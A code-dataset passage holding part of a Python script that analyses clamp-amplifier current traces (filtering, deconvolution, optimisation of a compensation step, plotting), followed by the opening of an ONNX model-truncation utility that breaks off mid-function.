integrated charge\n# TODO: search for optimal cc settings\n\n# analysis_type =['summary_stats', 'rf_swp']\n# analysis_type =['deconvolve']\n#analysis_type = ['im_noise']\n#analysis_type = ['im_vs_rf_plot']\n#analysis_type = ['rf_swp']\nanalysis_type = ['none']\n# analysis_type = ['check_impulse']\n\n# analysis examples\n\ndef adjust_step_delay(x, cc_step_func):\n cc_step_adj = delayseq_interp(cc_step_func, x[0], FS)\n return cc_step_adj\n\ndef adjust_step_scale(x, cc_step_func):\n cc_step_adj = cc_step_func*x[0]\n return cc_step_adj\n\n\n\ndef adjust_step(x, cc_step_func):\n \"\"\"\n a scale and a delay + 4 low-pass + 2 high pass + a runt\n \"\"\"\n\n cc_step_adj = delayseq_interp(cc_step_func*x[0], x[1], FS)\n\n for idx in range(6):\n j=idx*3\n if idx < 2:\n order = 1\n cc_step_adj += delayseq_interp(butter_lowpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n if idx < 4:\n order = 2\n cc_step_adj += delayseq_interp(butter_lowpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n else:\n order = 4\n cc_step_adj += delayseq_interp(butter_highpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n\n # add a runt: scale, width, location\n runt = np.zeros(len(cc_step_adj))\n runt[int(x[-2]):int(x[-1])] = x[-3] # initialize guess 0.1, location of step_func start, 6 us = 30 indices\n cc_step_adj += runt\n return cc_step_adj\n\ndef adjust_step2(x, cc_step_func):\n \"\"\"\n a scale and a delay + 2 low-pass + 1 high pass + a runt\n \"\"\"\n cc_step_adj = delayseq_interp(cc_step_func*x[0], x[1], FS)\n\n for idx in range(3):\n j=idx*3\n if idx < 1:\n order = 1\n cc_step_adj += delayseq_interp(butter_lowpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n if idx < 2:\n order = 4\n cc_step_adj += delayseq_interp(butter_lowpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n else:\n order = 2\n cc_step_adj += delayseq_interp(butter_highpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n\n # add a runt: scale, width, location\n runt = np.zeros(len(cc_step_adj))\n runt[int(x[-2]):int(x[-1])] = x[-3] # initialize guess 0.1, location of step_func start, 6 us = 30 indices\n cc_step_adj += runt\n\n return cc_step_adj\n\n\ndef adjust_step3(x, cc_step_func, PLT=False):\n \"\"\"\n processing of the CC signal that is appropriate for FPGA implementation\n a scale and a delay + 4-order low-pass\n (3 copies )\n \"\"\"\n if PLT:\n fig,ax=plt.subplots()\n\n cc_step_adj0 = delayseq_interp(cc_step_func*x[0], x[1], FS) # direct delay and scale that will then be filtered \n cc_step_adj1 = delayseq_interp(cc_step_func*x[2], x[3], FS) # delay that will then be filtered \n cc_step_adj2 = delayseq_interp(cc_step_func*x[4], x[5], FS) # delay and scale that will be added to the filtered results \n cc_step_adj3 = delayseq_interp(cc_step_func*x[6], x[7], FS) # delay and scale that will be added to the filtered results \n\n if PLT:\n ax.plot(cc_step_adj2, label='adj2')\n ax.plot(cc_step_adj1, label='1')\n\n order = 4\n cc_step_adj1 = butter_lowpass_filter(cc_step_adj1, cutoff=x[8], fs=FS, order=order)\n if PLT:\n ax.plot(cc_step_adj1, label='2')\n cc_step_adj2 = butter_lowpass_filter(cc_step_adj2, cutoff=x[9], fs=FS, order=order)\n\n cc_step_adj3 = butter_lowpass_filter(cc_step_adj3, cutoff=x[10], fs=FS, order=order)\n\n if PLT:\n ax.plot(cc_step_adj1, label='3')\n\n cc_step_adj = cc_step_adj1 + cc_step_adj2 + cc_step_adj3 + cc_step_adj0\n if PLT:\n ax.plot(cc_step_adj1, label='4')\n ax.legend()\n\n return cc_step_adj\n\nif 'im_noise_v0' in analysis_type:\n file_name = 'cc_swp_0.h5'\n t, adc = read_h5(data_dir_covg.format(2022, 1, 7), file_name, [0,1])\n ax = plot_adc(t, adc[0])\n filt_data = butter_lowpass_filter(adc[0], 1e6, 5e6, order=5)\n ax = plot_adc(t, filt_data)\n filt_data = butter_lowpass_filter(adc[0], 20e3, 5e6, order=5)\n plot_adc(t, filt_data)\n\nif 'im_movie' in analysis_type:\n import time\n for i in range(24):\n read_plot(data_dir, f'cc_swp_{i}.h5', filter_bw=[None])\n plt.show()\n plt.pause(0.01)\n time.sleep(2)\n plt.close('all')\n\nif 'summary_stats' in analysis_type:\n filename = 'cc_swp4'\n # load CSV summary as Pandas dataframe\n csv_summary = glob.glob(os.path.join(data_dir, f'{filename}_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n\n # use 7e5 as lowest peak area without acquisition issue\n min_peakarea_ok = 7e5\n idx = output.peak_area > min_peakarea_ok\n\n # plot trace with minimum peak area\n min_pa = output[idx].peak_area.min()\n min_row = output[output.peak_area == min_pa]\n ax, t, adc_data = read_plot(data_dir, min_row.filename.item() + '.h5', chan_list=[0], filter_bw=None, ax=None, clr='b')\n ax.set_title('Minimum peak area')\n\n max_pa = output[idx].peak_area.max()\n max_row = output[output.peak_area == max_pa]\n ax, t, adc_data = read_plot(data_dir, max_row.filename.item() + '.h5', chan_list=[0], filter_bw=None, ax=None, clr='b')\n ax.set_title('Maximum peak area')\n\n\n\n def plot_one_vs(x_var='cc_scale', x_var_label='CC scaling', leg_var='cc_delay',\n other_var='cc_fc', y_var='peak_area'):\n # vary cc_scale at constant delay and fc\n # y-axis: peak_area\n # x-axis: cc_scale\n # legend: cc_delay\n # other: cc_fc at midpoint\n scaling = 4e-3\n\n idx = output['peak_area'] > min_peakarea_ok\n leg_var_unq = np.unique(output[leg_var])\n leg_var_unq_mid = leg_var_unq[len(leg_var_unq)//2]\n\n min_row = output[output.peak_area == min_pa]\n other_var_val = min_row[other_var].item()\n print(f'Found {other_var} value of {other_var_val} at minimum row')\n\n idx_other = idx & (output[other_var] == other_var_val)\n colors = iter(plt.cm.rainbow(np.linspace(0, 1, len(leg_var_unq))))\n fig, ax = plt.subplots()\n for leg_var_val in leg_var_unq:\n idx_subset = idx_other & (output[leg_var] == leg_var_val)\n lbl = leg_var + ' = {:0.2g}'.format(leg_var_val)\n ax.plot(output[idx_subset][x_var], output[idx_subset][y_var]*scaling,\n marker='*', linestyle='None', color=next(colors), label=lbl) # uC\n\n ax.set_ylabel('Area of |Im| $\\mu$C')\n ax.set_xlabel(f'{x_var_label}')\n ax.legend()\n plt.savefig(os.path.join(data_dir, f'fig_{y_var}_vs_{x_var}'))\n\n plot_one_vs(x_var='cc_delay', x_var_label='CC delay', leg_var='cc_fc',\n other_var='cc_scale', y_var='peak_area')\n\n\nif 'trace_comparison' in analysis_type:\n colors = iter(plt.cm.rainbow(np.linspace(0, 1, np.sum(idx))))\n fn = output[idx].filename\n cc_scale = output[idx].cc_scale\n ax, t, adc_data = read_plot(data_dir, fn.iloc[0] + '.h5', chan_list=[0], filter_bw=None, ax=None, clr=next(colors), lbl='cc = {:.2f}'.format(cc_scale.iloc[0]))\n for f, cc_s in zip(fn[1:], cc_scale[1:]):\n ax, t, adc_data = read_plot(data_dir, f + '.h5', chan_list=[0], filter_bw=None, ax=ax, clr=next(colors), lbl='cc = {:.2f}'.format(cc_s),\n scaling = 4)\n ax.legend()\n ax.set_xlim([1400, 3000])\n plt.savefig(os.path.join(data_dir, 'fig_vary_ccscale'))\n\n # vary delay at constant fc and scale\n idx = output.peak_area > 7e5\n cc_scale = np.unique(output.cc_scale)\n cc_scale_mid = cc_scale[3]\n # ('cc_scale', min_row.cc_scale.item())\n for col in [('cc_scale', cc_scale_mid), ('cc_fc', min_row.cc_fc.item())]:\n idx = idx & (output[col[0]] == col[1])\n\n fig, ax = plt.subplots()\n ax.plot(output[idx].cc_delay, output[idx].peak_area*4e-3, marker='*') # uC\n ax.set_ylabel('Area of |Im| $\\mu$C')\n ax.set_xlabel('CC delay')\n plt.savefig(os.path.join(data_dir, 'fig_area_vs_ccdelay'))\n\n colors = iter(plt.cm.rainbow(np.linspace(0, 1, np.sum(idx))))\n fn = output[idx].filename\n cc_delay = output[idx].cc_delay\n ax, t, adc_data = read_plot(data_dir, fn.iloc[0] + '.h5', chan_list=[0], filter_bw=None, ax=None, clr=next(colors), lbl='cc = {:.2f}'.format(cc_delay.iloc[0]))\n for f, cc_s in zip(fn[1:], cc_delay[1:]):\n ax, t, adc_data = read_plot(data_dir, f + '.h5', chan_list=[0], filter_bw=None, ax=ax, clr=next(colors), lbl='delay = {:.2f}'.format(cc_s*1e6),\n scaling = 4)\n ax.legend()\n ax.set_xlim([1400, 3000])\n plt.savefig(os.path.join(data_dir, 'fig_vary_ccdelay'))\n\n\nif 'im_vs_rf_plot' in analysis_type:\n data_dir = data_dir_covg.format(2022, 1, 16)\n filename = 'rf_swp3'\n csv_summary = glob.glob(os.path.join(data_dir, f'{filename}_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n tmin = 3175\n for cc_scale in [0, -0.33]:\n fig, ax = plt.subplots()\n colors = iter(plt.cm.rainbow(np.linspace(0, 1, len(np.unique(output.rf))-1)))\n for index, r in output.iterrows():\n t, adc_data = read_h5(data_dir, r.filename + '.h5', [0,1])\n if r.rf < 1000:\n ccomp = 47\n else:\n ccomp = 4747\n if ((r.cc_scale == cc_scale) and (r.ccomp == ccomp) and (r.rf < 4000)):\n lbl = '{:0.2f} DN/nA ($R_F$={} k$\\Omega$)'.format(dn_per_nA(r.rf*1e3), int(r.rf))\n ax.plot(t*1e6 - tmin, adc_data[0], label=lbl, color=next(colors))\n print(f'RF = {r.rf}, filename = {r.filename}, cc_scale = {r.cc_scale}')\n ax.set_xlabel('t [$\\mu$s]')\n ax.set_ylabel('$I_m$ [DN]')\n ax.set_xlim([0, 0 + 150])\n ax.set_ylim([-200, 2**15])\n ax.legend()\n if cc_scale == 0:\n plt.savefig(os.path.join(fig_dir, 'im_vs_rf_plot_noCC.png'))\n else:\n plt.savefig(os.path.join(fig_dir, 'im_vs_rf_plot_CC.png'))\n\nif 'rf_swp' in analysis_type:\n data_dir = data_dir_covg.format(2022, 1, 16)\n filename = 'rf_swp3'\n csv_summary = glob.glob(os.path.join(data_dir, f'{filename}_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n\n h5_files = glob.glob(os.path.join(data_dir, f'{filename}_*.h5'))\n pa_arr = np.array([])\n for hf in h5_files:\n ax, t, adc_data = read_plot(data_dir, hf.split('/')[-1], chan_list=[0])\n plt.pause(1)\n plt.close('all')\n pa, num_found = peak_area(t, adc_data[0])\n pa_arr = np.append(pa_arr, pa)\n\n # alternatively, use the dataframe to find the files to plot\n for ccomp in [47, 4747]:\n for cc_scale in [0, -0.33]:\n fig, ax = plt.subplots()\n if ccomp < 1000:\n rf_test = 3000\n idx = (output.ccomp == ccomp) & (output.cc_scale == cc_scale) & (output.rf < rf_test)\n else:\n rf_test = 100000 # all rfs\n idx = (output.ccomp == ccomp) & (output.cc_scale == cc_scale) & (output.rf < rf_test)\n clrs = iter(plt.cm.rainbow(np.linspace(0, 1, np.sum(idx))))\n for idx, r in output.iterrows():\n t, adc_data = read_h5(data_dir, r.filename + '.h5', chan_list=[0])\n if (r.ccomp == ccomp) and (r.cc_scale == cc_scale) and (r.rf < rf_test):\n ax, t, adc_data = read_plot(data_dir, r.filename + '.h5', chan_list=[0],\n ax=ax, clr=next(clrs))\n\n DEBUG_FIT_PLOT = False\n im_df = pd.DataFrame()\n im_data = {}\n noise_time = [2500e-6, 2900e-6]\n peak_time = [3200e-6, 3400e-6]\n for idx, r in output.iterrows():\n t, adc_data = read_h5(data_dir, r.filename + '.h5', chan_list=[0])\n t=t[64:]\n adc_data[0]=adc_data[0][64:]\n # calculate peak rise-time, peak fall-time (time-constant), integrated charge, noise [full BW and 3 kHz], undershoot\n im_data['rf'] = r.rf\n im_data['ccomp'] = r.ccomp\n im_data['cc_scale'] = r.cc_scale\n idx_noise = idx_timerange(t, noise_time[0], noise_time[1])\n im_data['noise_nofilt'] = np.std(adc_data[0][idx_noise]/dn_per_nA(r.rf*1e3))\n im_data['noise_3k_filt'] = np.std(butter_lowpass_filter(adc_data[0][idx_noise]/dn_per_nA(r.rf*1e3), cutoff=3e3, fs=FS, order=5))\n im_data['filename'] = r.filename\n\n y = adc_data[0]\n t_peaks, idx_pk, results = find_peak(t, y, th=5, distance=10000)\n print(t_peaks)\n t_nearest = find_nearest(t_peaks, peak_time[0])\n idx_decay = idx_timerange(t, t_nearest, t_nearest+120e-6)\n y = adc_data[0][idx_decay]/dn_per_nA(r.rf*1e3)\n # idx_decay = idx_timerange(t, peak_time[0], peak_time[1])\n # tau, amp = np.polyfit(t[idx_decay], np.log(y), 1, w=np.sqrt(y))\n exp_fits, err = curve_fit(lambda t,a,tau: a*np.exp(-t/tau),\n t[idx_decay]-t[idx_decay][0], y,\n p0=[10000, 1e3*33e-9])\n im_data['tau'] = exp_fits[1]\n im_data['amp'] = exp_fits[0]\n im_data['peak_time'] = t_nearest\n # integrate around the peak for total charge\n idx_integrate = idx_timerange(t, t_nearest-120e-6, t_nearest+300e-6)\n y = adc_data[0][idx_integrate]/dn_per_nA(r.rf*1e3)\n im_data['integrated_charge_nC'] = trapezoid(y, t[idx_integrate])\n\n if DEBUG_FIT_PLOT:\n fig, ax = plt.subplots()\n ax.plot(t[idx_decay]-t[idx_decay][0], y, color='b')\n ax.plot(t[idx_decay]-t[idx_decay][0], exp_fits[0]*np.exp( -(t[idx_decay]-t[idx_decay][0])/exp_fits[1]), color='r')\n print(im_data)\n input()\n plt.close('all')\n\n im_df = im_df.append(im_data, ignore_index=True)\n\nif 'deconvolve' in analysis_type:\n\n def wiener_deconvolution(signal, kernel, lambd=1e-3):\n \"\"\"Applies Wiener deconvolution to find true observation from signal and filter\n\n The function can be also used to estimate filter from true signal and observation\n \"\"\"\n # zero pad the kernel to same length\n kernel = np.hstack((kernel, np.zeros(len(signal) - len(kernel))))\n H = fft(kernel)\n deconvolved = np.real(ifft(fft(signal)*np.conj(H)/(H*np.conj(H) + lambd**2)))\n return deconvolved\n\n data_dir = data_dir_covg.format(2022, 1, 19)\n filename = 'step_swp_{}'\n t_offset_idx = 64\n t_offset = 64*200e-9\n csv_summary = glob.glob(os.path.join(data_dir, f'*_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n\n # try with 20 and 21 which is Rf = 100 k and Ccomp = 47 pF\n # TODO: do I need to consider the difference in values between CC and CMD?\n for nums in ([20,21], [30,31], [14,15], [40,41]):\n\n def get_impulse(num):\n \"\"\" get the impulse of an Im trace by calculating the derivative\n \"\"\"\n t, adc_data = read_h5(data_dir, filename.format(num) + '.h5', chan_list=[0])\n t=t[t_offset_idx:]\n adc_data[0]=adc_data[0][t_offset_idx:]\n\n # make step function at t0\n t0 = 3200e-6*2\n idx_signal = idx_timerange(t, t0-150e-6, t0 + 200e-6)\n y = adc_data[0][idx_signal]\n while y[0]==0:\n y = y[1:] # deconvolution fails if the first element is zero\n\n # step function is not necessary but could be used for plotting convolution\n idx_step = idx_timerange(t, t0-350e-6, t0 + 400e-6)\n t_conv = t[idx_step]\n step_func = np.ones(len(t_conv)) # can't have 0s in the filter function\n step_func[t_conv < t0] = 0\n step_func_fullbw = step_func\n step_func = butter_lowpass_filter(step_func, cutoff=1e6, fs=FS, order=5)\n # The length of the deconvolution output is: len(signal) - len(filter) + 1\n # imp_resp, remainder = deconvolve(step_func, y)\n y = butter_lowpass_filter(y, cutoff=1e6, fs=FS, order=5)\n\n # the Wiener deconvolution adds noise to the denominator so that the result doesn't explode.\n # imp_resp_w = wiener_deconvolution(y, step_func)[:(len(y)-len(step_func) + 1)]\n # imp_resp_w = wiener_deconvolution(y, step_func)[:(248)]\n\n # An FFT-based deconvolution of a step response is fraught since the step response has a\n # low information FFT. Large at f=0 and then constant at all other frequencies.\n # seems better to simply take the derivative ... this gives the impulse response\n imp_resp_d = np.gradient(y, t[1]-t[0])\n return imp_resp_d, step_func, step_func_fullbw\n\n alpha_cmd, step_func, step_func_fullbw = get_impulse(nums[0])\n beta_cc, _, _ = get_impulse(nums[1])\n\n def im_conv(x, cc_step_func):\n \"\"\" convolve the impulse function with a step function after adjusting the step function\n that is applied to the cc impulse function\n return the sum of the absolute value of the current\n \"\"\"\n cc_step_adj = adjust_step2(x, cc_step_func)\n return np.sum(np.abs(np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + np.convolve(beta_cc, cc_step_adj, mode='valid')))\n\n fig, ax = plt.subplots()\n ax.plot(np.convolve(alpha_cmd, step_func, mode='valid') + np.convolve(beta_cc, step_func, mode='valid'))\n\n fig, ax = plt.subplots()\n ax.plot(alpha_cmd, 'b', label='cmd')\n ax.plot(beta_cc, 'r', label='cc')\n fig.suptitle('Impulse response of cmd,cc')\n\n fig, ax = plt.subplots()\n y = np.convolve(alpha_cmd, step_func, mode='valid') + np.convolve(beta_cc, step_func, mode='valid')\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t,y)\n fig.suptitle('Conv of step with CMD and CC impulse')\n\n # this minimize method works reasonably well but suspect it needs to use something like a\n # basin-hopping method since it doesn't use all of the knobs it is given (finds a local minimum??)\n # im_conv([0,100e3,0,100e3,0,1.3], step_func)\n # deconvolution is messy -- optimize the step_func that is convolved with beta_cc\n OPTIMIZE = False\n HOP = False\n\n if OPTIMIZE:\n runt_idx = np.argmax(step_func_fullbw>0.5)\n # bnds = ((-2, 2), (-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n # (-0.3, 0.3), (runt_idx-50, runt_idx+50), (runt_idx-20, runt_idx+80))\n # out_min = minimize(im_conv, x0=[0.5,0,\n # 0.5, 100e3, 10e-6,\n # 0.5,100e3, 0e-6,\n # 0.5, 100e3, -10e-6,\n # 0.5,100e3, 0e-6,\n # 0.02, 200e3, -10e-6,\n # 0.02, 200e3, 10e-6,\n # 0.1, runt_idx, runt_idx+30],\n # args=(step_func_fullbw), bounds=bnds, method='L-BFGS-B')\n\n bnds = ((-2, 2), (-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n (-0.3, 0.3), (runt_idx-50, runt_idx+50), (runt_idx-20, runt_idx+80))\n out_min = minimize(im_conv, x0=[0.5,0,\n 0.5, 100e3, 10e-6,\n 0.5,100e3, 0e-6,\n 0.5, 100e3, -10e-6,\n 0.1, runt_idx, runt_idx+30],\n args=(step_func_fullbw), bounds=bnds, method='L-BFGS-B')\n\n fig, ax = plt.subplots()\n y = np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + np.convolve(beta_cc, step_func_fullbw, mode='valid')\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t*1e6, y, 'b')\n ax.plot(t*1e6, np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + np.convolve(beta_cc, adjust_step(out_min['x'], step_func_fullbw), mode='valid'), 'r')\n ax.plot(t*1e6, np.convolve(alpha_cmd, step_func_fullbw, mode='valid'), 'k')\n\n fig, ax = plt.subplots()\n y = adjust_step(out_min['x'], step_func_fullbw)\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t,y)\n\n if HOP:\n runt_idx = np.argmax(step_func_fullbw>0.5)\n bnds = ((-2, 2), (-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n (-0.3, 0.3), (runt_idx-50, runt_idx+50), (runt_idx-20, runt_idx+80))\n\n minimizer_kwargs = { \"method\": \"L-BFGS-B\",\"bounds\":bnds,\"args\":(step_func_fullbw) }\n out_hop = basinhopping(im_conv, x0=[0.5,0,\n 0.5, 100e3, 10e-6,\n 0.5, 100e3, 0e-6,\n 0.5, 100e3, -10e-6,\n 0.1, runt_idx, runt_idx+30],\n minimizer_kwargs = minimizer_kwargs)\n\n fig, ax = plt.subplots()\n y = adjust_step(out_hop['x'], step_func_fullbw)\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t,y)\n\n fig, ax = plt.subplots()\n y = np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + np.convolve(beta_cc, step_func_fullbw, mode='valid')\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t*1e6, y, 'b', label='CMD + CC step')\n ax.plot(t*1e6, np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + \\\n np.convolve(beta_cc, adjust_step2(out_hop['x'], step_func_fullbw), mode='valid'), 'r', label='CMD + CC comp.')\n ax.plot(t*1e6, np.convolve(alpha_cmd, step_func_fullbw, mode='valid'), 'k', label='CMD only')\n ax.legend()\n\n import pickle\n with open(os.path.join(data_dir, f'basin_hop_cc_nums{nums[0]}.pickle'), 'wb') as handle:\n pickle.dump(out_hop, handle, protocol=pickle.HIGHEST_PROTOCOL)\n plt.close('all')\n\n # other method -- deconvolve\n DECONV = False\n if DECONV:\n FILTER = False\n imp_idx_low = 750\n imp_idx_high = 1500\n\n alpha_cmd, step_func, step_func_fullbw = get_impulse(nums[0])\n beta_cc, _, _ = get_impulse(nums[1])\n\n if FILTER:\n alpha_cmd_filt = butter_lowpass_filter(alpha_cmd, 1e6, FS, order=4)[imp_idx_low:imp_idx_high]\n beta_cc_filt = butter_lowpass_filter(beta_cc, 1e6, FS, order=4)[imp_idx_low:imp_idx_high]\n else:\n alpha_cmd_filt = alpha_cmd[imp_idx_low:imp_idx_high] # cut TODO: pad with zeros?\n beta_cc_filt = beta_cc[imp_idx_low:imp_idx_high]\n\n fig, ax = plt.subplots()\n ax.plot(alpha_cmd_filt, 'b', label='CMD')\n ax.plot(beta_cc_filt, 'r', label='CC')\n fig.suptitle('Cropped impulse response')\n ax.legend()\n\n f1 = -wiener_deconvolution(alpha_cmd_filt,\n beta_cc_filt)\n fig, ax = plt.subplots()\n ax.plot(f1, 'b')\n fig.suptitle('Deconvolution of CMD and CC impulse')\n\n cc_cmd = np.convolve(f1, step_func_fullbw, mode='valid') # same: max(n, m) # full: len(n+m-1), valid: max(m,n) - min(m,n) - 1\n # cc_cmd is shifted by the length of f1 since using valid\n fig, ax = plt.subplots()\n # cc_cmd[1745:] = cc_cmd[1745]\n ax.plot(cc_cmd, 'b', label='CC cmd')\n ax.plot(step_func_fullbw, 'r', label='Step function')\n fig.suptitle('')\n\n # TODO: very close, summed waveform creates a small current step function\n # after the CMD pulse that persists for 30 us (or 150 samples)\n # I suspect this is something to do with convolution edge effects, or with\n # DC values in the impulse responses?\n\n idx_cmd_base = len(f1) - 1\n # cut and shift\n for idx_cmd_shift in [0]:\n idx_cmd = idx_cmd_base + idx_cmd_shift\n cc_cmd_cut = cc_cmd\n step_func_fullbw_cut = step_func_fullbw[(idx_cmd):]\n fig, ax = plt.subplots()\n ax.plot(cc_cmd_cut, 'b')\n ax.plot(step_func_fullbw_cut, 'r')\n fig, ax = plt.subplots()\n y = np.convolve(alpha_cmd_filt, step_func_fullbw_cut, mode='valid') + np.convolve(beta_cc_filt, cc_cmd_cut, mode='valid')\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t*1e6, y, 'b')\n ax.plot(t*1e6, np.convolve(alpha_cmd_filt, step_func_fullbw_cut, mode='valid'), 'r')\n\nif 'im_noise' in analysis_type:\n data_dir = data_dir_covg.format(2022, 1, 18)\n filename = 'rf_swp'\n csv_summary = glob.glob(os.path.join(data_dir, f'{filename}_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n\n im_df = pd.DataFrame()\n pa_arr = np.array([])\n idx_start = 4000*5\n for index, r in output.iterrows():\n if r.cmd_val == 0:\n im_data = {}\n t, adc_data = read_h5(data_dir, r.filename + '.h5', [0,1])\n # plt.pause(1)\n plt.close('all')\n\n im_data['rf'] = r.rf\n im_data['ccomp'] = r.ccomp\n im_data['cc_scale'] = r.cc_scale\n im_data['cc_val'] = r.cmd_val\n # idx_noise = idx_timerange(t, noise_time[0], noise_time[1])\n im_data['noise_nofilt'] = np.std(adc_data[0][idx_start:]/dn_per_nA(r.rf*1e3))\n im_data['noise_3k_filt'] = np.std(butter_lowpass_filter(adc_data[0][idx_start:]/dn_per_nA(r.rf*1e3), cutoff=3e3, fs=FS, order=5))\n im_data['filename'] = r.filename\n im_df = im_df.append(im_data, ignore_index=True)\n\n\n# read in all h5 in data_dir and determine peak-area\nif 'plot_all_im' in analysis_type:\n # ax, adc_data, t = read_plot(os.path.join(data_dir, f'cc_swp_{i}.h5'), filter_bw=[None])\n h5_files = glob.glob(os.path.join(data_dir, '*.h5'))\n pa_arr = np.array([])\n for hf in h5_files:\n t, adc_data = read_h5(data_dir, hf.split('/')[-1], chan_list=[0])\n pa, num_found = peak_area(t, adc_data[0])\n pa_arr = np.append(pa_arr, pa)\n\nif 'check_impulse' in analysis_type:\n data_dir = '/Users/koer2434/OneDrive - University of St. Thomas/UST/research/covg/fpga_and_measurements/daq_v2/data/clamp/20220125'\n file_name = 'test_tune_rf100_ccomp47_{}'\n\n tl = 6500\n tr = 6800\n\n idx = 0\n cmd_impulse, t, t0 = get_impulse(data_dir, file_name.format(idx))\n\n fig,ax=plt.subplots()\n ax.plot(t*1e6, cmd_impulse, label='$h_{CMD}$')\n ax.plot(t*1e6, np.cumsum(cmd_impulse/40), label='$\\Sigma_0^t h_{CMD}/40$')\n ax.set_xlabel('t [$\\mu$s]')\n ax.set_ylabel('DN/s')\n ax.set_xlim([tl, tr])\n\n ax.legend()\n plt.tight_layout()\n plt.savefig(os.path.join(fig_dir, 'cmd_impulse_integral.png'))\n\n tl = 6500\n tr = 6800\n\n idx = 1\n cmd_impulse, t, t0 = get_impulse(data_dir, file_name.format(idx))\n\n fig,ax=plt.subplots()\n ax.plot(t*1e6, cmd_impulse, label='$h_{CC}$')\n ax.plot(t*1e6, np.cumsum(cmd_impulse/40), label='$\\Sigma_0^t h_{CC}/40$')\n ax.set_xlabel('t [$\\mu$s]')\n ax.set_ylabel('DN/s')\n ax.set_xlim([tl, tr])\n\n ax.legend()\n plt.tight_layout()\n plt.savefig(os.path.join(fig_dir, 'cc_impulse_integral.png'))\n\n h5_files = glob.glob(os.path.join(data_dir, '*rf*0.h5'))\n fig,ax=plt.subplots()\n\n for hf in h5_files:\n fname = hf.split('/')[-1]\n fname = fname.replace('.h5', '')\n rf_val = int(fname.split('_')[2].replace('rf',''))\n cmd_impulse, t, t0 = get_impulse(data_dir, fname)\n idx = idx_timerange(t, tl*1e-6, tr*1e-6)\n ax.plot(t[idx]*1e6, cmd_impulse[idx], label='$h_{CMD}: ' + ' R_F={} k \\Omega$'.format(rf_val))\n ax.set_xlabel('t [$\\mu$s]')\n ax.set_ylabel('DN/s')\n tl = 6550\n tr = 6750\n ax.set_xlim([tl, tr])\n\n ax.legend()\n plt.tight_layout()\n plt.savefig(os.path.join(fig_dir, 'impulse_sweep.png'))\n","repo_name":"lucask07/covg_fpga","sub_path":"python/analysis/clamp_data.py","file_name":"clamp_data.py","file_ext":"py","file_size_in_byte":30321,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"69889712365","text":"import argparse\nimport onnx\nimport onnx.helper\nimport onnx.version_converter\nfrom onnxsim import simplify\nimport copy\n\nimport sys\nsys.path.append('./basicUtil')\nfrom baseUtil import *\n#from ..basicUtil.baseUtil import *\n\nimport logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input_model\", type=str, default=\"/workspace/nxu/model/customer/gelingshentong/20230717/encoder_new_preopt.onnx\", help=\"input onnx model path\")\n parser.add_argument(\"-o\", \"--output_model\", type=str, default=\"/home/nxu/workspace/model/customer/gelingshentong/20230717/encoder_new_preopt_strip.onnx\", help=\"output onnx model path\")\n parser.add_argument(\"-v\", \"--set_opset_version\", type=int, default=11, help=\"Target opset version\")\n parser.add_argument(\"-t\", \"--tensor_names\", nargs='+', type=str, default=['encoder_out_new', 'onnx__Add_2938_convOut'], help=\"A list of names of nodes to delete\")\n parser.add_argument(\"-u\", \"--untruncated_branch\", nargs='+', type=str, default=['MatMul_1909_Conv'], help=\"Branches that need to be kept during truncation, in list format, fill in node name\")\n parser.add_argument(\"--convert_opset\", action='store_true', help=\"whether to convert opsert version, defualt no modify\")\n args = parser.parse_args()\n return args\n\ndef create_tensor_without_outconnect_to_netoutput(onnx_model):\n netOutNames = [netOutput.name for netOutput in onnx_model.graph.output]\n for node in onnx_model.graph.node:\n for output in node.output:\n outNodesList = get_node_by_input(onnx_model, [output])\n if outNodesList or output in netOutNames:\n continue\n outShape = get_shape_by_name(onnx_model, output)\n outDtype = get_dtype_by_name(onnx_model, output)\n newNetOut = onnx.helper.make_tensor_value_info(output, outDtype, outShape)\n onnx_model.graph.output.append(newNetOut)\n netOutNames.append(output)\n return onnx_model\n\ndef convert_opset_version(onnx_model, dst_version):\n 